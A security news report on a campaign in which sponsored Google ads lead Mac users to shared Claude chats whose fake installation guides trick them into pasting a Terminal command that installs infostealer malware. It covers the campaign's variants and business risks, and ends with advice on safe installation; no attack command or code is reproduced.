Mac users face Claude malware trap

Mac users searching for Claude downloads are being targeted through sponsored Google results that lead to legitimate-looking Claude shared chats carrying malicious installation instructions, exposing a weakness in how trusted platforms can be misused to deliver malware.

The campaign centres on users looking for Claude or Claude Code for macOS. Instead of relying only on fake websites, the attackers are placing paid search ads that display the claude. ai domain and then direct users to publicly shared Claude conversations. Those pages present themselves as installation guides, sometimes using language designed to resemble official support material, and urge users to open Terminal and paste a command.

That single step is the heart of the attack. The command retrieves encoded scripts from attacker-controlled servers and executes them on the victim’s Mac. Security researchers tracking the campaign found that the payload can run largely in memory, reducing the visible traces left on the device and making the infection harder for ordinary users to spot.

The tactic reflects a shift in malware delivery aimed at developers, creators and business users adopting artificial intelligence tools. Claude Code, Anthropic’s terminal-based coding assistant, is used by developers to work across codebases, automate tasks and manage programming workflows. That makes it an attractive lure because installation guides for developer tools often involve copying commands into Terminal, a practice attackers can exploit.

Investigators have identified more than one variant of the campaign. One version has been linked to a MacSync-style infostealer capable of collecting browser credentials, cookies and macOS Keychain data. Another observed variant gathers information about the victim’s machine, including external IP address, hostname, operating system details and keyboard locale, before attempting to fetch additional payloads.

The malware chain also appears to screen victims before proceeding. One variant checks for Russian or Commonwealth of Independent States keyboard input sources and exits if they are present, a filtering technique seen in several criminal malware operations. Machines that pass the check can receive further instructions through macOS scripting tools, giving attackers a path to remote code execution without presenting the victim with a conventional application installer.

The use of legitimate Claude shared-chat pages complicates the normal security advice given to users. A suspicious domain is often a warning sign, but this campaign benefits from the presence of a real claude. ai address in the search result. The malicious content is not an official Anthropic page; it is user-generated material hosted through a sharing feature. That distinction may be clear to security professionals, but it is easily missed by users who arrive from a sponsored result and see a familiar domain.

The campaign follows a broader pattern of cybercriminals abusing demand for AI tools. Fake Claude installers for Windows have also circulated, including malicious packages that mimic a working Claude client while deploying loader malware and backdoor components. Other campaigns have impersonated AI developer tools and open-source repositories to distribute infostealers targeting browsers, crypto wallets, session cookies and development environments.

For businesses, the risk is greater than the compromise of a single laptop. Developers often store API keys, cloud credentials, private repository access tokens and internal documentation on their workstations. A successful infection can therefore become a gateway to source code theft, unauthorised cloud access or follow-on attacks against corporate systems.

The official Claude Code installation route relies on verified documentation and trusted package sources, not commands copied from sponsored ads or shared chats. Users should navigate directly to official Anthropic pages, check documentation carefully, avoid instructions attributed to unrelated brands such as “Apple Support” on third-party or user-generated pages, and treat any Terminal command that downloads and executes remote code as high risk.